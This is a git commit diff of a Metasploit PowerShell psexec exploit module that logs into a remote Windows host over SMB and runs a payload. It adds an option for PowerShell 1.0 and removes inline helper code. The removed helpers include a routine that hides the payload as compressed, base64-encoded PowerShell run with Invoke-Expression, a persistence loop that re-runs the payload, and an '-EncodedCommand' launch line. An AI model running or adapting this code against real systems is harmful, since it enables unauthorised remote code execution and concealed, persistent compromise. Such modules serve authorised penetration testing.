add libs from #1379 and allow psh 1.0 exec against older hosts
RageLtMan
parent
61cd3b55fc
commit
6ba85d4c06
|
|
@ -1,16 +1,19 @@
|
||||||
# -*- coding: binary -*-
|
# -*- coding: binary -*-
|
||||||
|
#!/usr/bin/env ruby
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
|
# Exploit mixins should be called first
|
||||||
include Msf::Exploit::Remote::DCERPC
|
include Msf::Exploit::Remote::DCERPC
|
||||||
include Msf::Exploit::Remote::SMB
|
include Msf::Exploit::Remote::SMB
|
||||||
include Msf::Exploit::Remote::SMB::Authenticated
|
include Msf::Exploit::Remote::SMB::Authenticated
|
||||||
|
include Msf::Exploit::Powershell
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
|
|
||||||
|
|
||||||
# Aliases for common classes
|
# Aliases for common classes
|
||||||
SIMPLE = Rex::Proto::SMB::SimpleClient
|
SIMPLE = Rex::Proto::SMB::SimpleClient
|
||||||
XCEPT = Rex::Proto::SMB::Exceptions
|
XCEPT = Rex::Proto::SMB::Exceptions
|
||||||
|
|
@ -71,31 +74,32 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Execute powershell in 32bit compatibility mode, payloads need native arch',
|
'Execute powershell in 32bit compatibility mode, payloads need native arch',
|
||||||
false
|
false
|
||||||
]),
|
]),
|
||||||
|
OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
# Build the script
|
command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
|
||||||
command = prep_psh_payload
|
|
||||||
|
|
||||||
# Try and authenticate with given credentials
|
#Try and authenticate with given credentials
|
||||||
if connect
|
if connect
|
||||||
begin
|
begin
|
||||||
smb_login
|
smb_login
|
||||||
rescue StandardError => autherror
|
rescue StandardError => autherror
|
||||||
print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
|
print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
# Execute the powershell command
|
# Execute the powershell command
|
||||||
begin
|
begin
|
||||||
print_status("#{peer} - Executing the payload...")
|
print_status("#{peer} - Executing the payload...")
|
||||||
return psexec(command)
|
#vprint_good(command)
|
||||||
rescue StandardError => exec_command_error
|
return psexec(command)
|
||||||
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
|
rescue StandardError => exec_command_error
|
||||||
return false
|
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||||
end
|
return false
|
||||||
disconnect
|
end
|
||||||
|
disconnect
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
@ -220,56 +224,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
return true
|
return true
|
||||||
end
|
end
|
||||||
|
|
||||||
# Return a zlib compressed powershell script
|
|
||||||
def compress_script(script_in)
|
|
||||||
|
|
||||||
# Compress using the Deflate algorithm
|
|
||||||
compressed_stream = ::Zlib::Deflate.deflate(script_in,
|
|
||||||
::Zlib::BEST_COMPRESSION)
|
|
||||||
|
|
||||||
# Base64 encode the compressed file contents
|
|
||||||
encoded_stream = Rex::Text.encode_base64(compressed_stream)
|
|
||||||
|
|
||||||
# Build the powershell expression
|
|
||||||
# Decode base64 encoded command and create a stream object
|
|
||||||
psh_expression = "$stream = New-Object IO.MemoryStream(,"
|
|
||||||
psh_expression += "$([Convert]::FromBase64String('#{encoded_stream}')));"
|
|
||||||
# Read & delete the first two bytes due to incompatibility with MS
|
|
||||||
psh_expression += "$stream.ReadByte()|Out-Null;"
|
|
||||||
psh_expression += "$stream.ReadByte()|Out-Null;"
|
|
||||||
# Uncompress and invoke the expression (execute)
|
|
||||||
psh_expression += "$(Invoke-Expression $(New-Object IO.StreamReader("
|
|
||||||
psh_expression += "$(New-Object IO.Compression.DeflateStream("
|
|
||||||
psh_expression += "$stream,"
|
|
||||||
psh_expression += "[IO.Compression.CompressionMode]::Decompress)),"
|
|
||||||
psh_expression += "[Text.Encoding]::ASCII)).ReadToEnd());"
|
|
||||||
|
|
||||||
# Convert expression to unicode
|
|
||||||
unicode_expression = Rex::Text.to_unicode(psh_expression)
|
|
||||||
|
|
||||||
# Base64 encode the unicode expression
|
|
||||||
encoded_expression = Rex::Text.encode_base64(unicode_expression)
|
|
||||||
|
|
||||||
return encoded_expression
|
|
||||||
end
|
|
||||||
|
|
||||||
def peer
|
def peer
|
||||||
return "#{rhost}:#{rport}"
|
return "#{rhost}:#{rport}"
|
||||||
end
|
end
|
||||||
|
|
||||||
# Return a command-line payload configured per datastore
|
|
||||||
def prep_psh_payload
|
|
||||||
psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.raw)
|
|
||||||
# Run our payload in a while loop
|
|
||||||
if datastore['PERSIST']
|
|
||||||
fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
|
|
||||||
sleep_time = rand(5)+5
|
|
||||||
psh_payload = "function #{fun_name}{#{psh_payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
|
|
||||||
end
|
|
||||||
# Convert to base64 for -encodedcommand execution
|
|
||||||
psh_payload = compress_script(psh_payload)
|
|
||||||
# Determine appropriate architecture
|
|
||||||
ps_bin = datastore['RUN_WOW64'] ? '%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
|
|
||||||
command = "%COMSPEC% /B /C start #{ps_bin} -EncodedCommand #{psh_payload}"
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue